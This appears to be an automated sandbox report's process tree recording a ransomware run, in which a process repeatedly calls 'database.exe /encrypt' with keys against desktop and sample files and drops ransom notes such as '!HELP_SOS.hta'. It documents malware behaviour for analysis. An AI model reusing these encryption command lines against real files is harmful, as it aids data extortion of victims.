                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\!HELP_SOS.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7680
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\#Decrypt_Files_ReadMe#.rtf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\A8TfBlMc-hK4WM9cK.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\AddGroup.mp4.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7704
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\AssertExpand.css.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7712
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ClearCheckpoint.cr2.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ClearRestore.mpeg3.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\CloseMeasure.ADT.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\cmd.exe.lnk.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\CmqL7QFf-57e8zezN.[[email protected]].gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7764
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\CompleteFormat.mid.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\ConvertFromExport.vssm.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7776
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\DisableProtect.cab.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7788
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Desktop\DisconnectWait.bmp.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
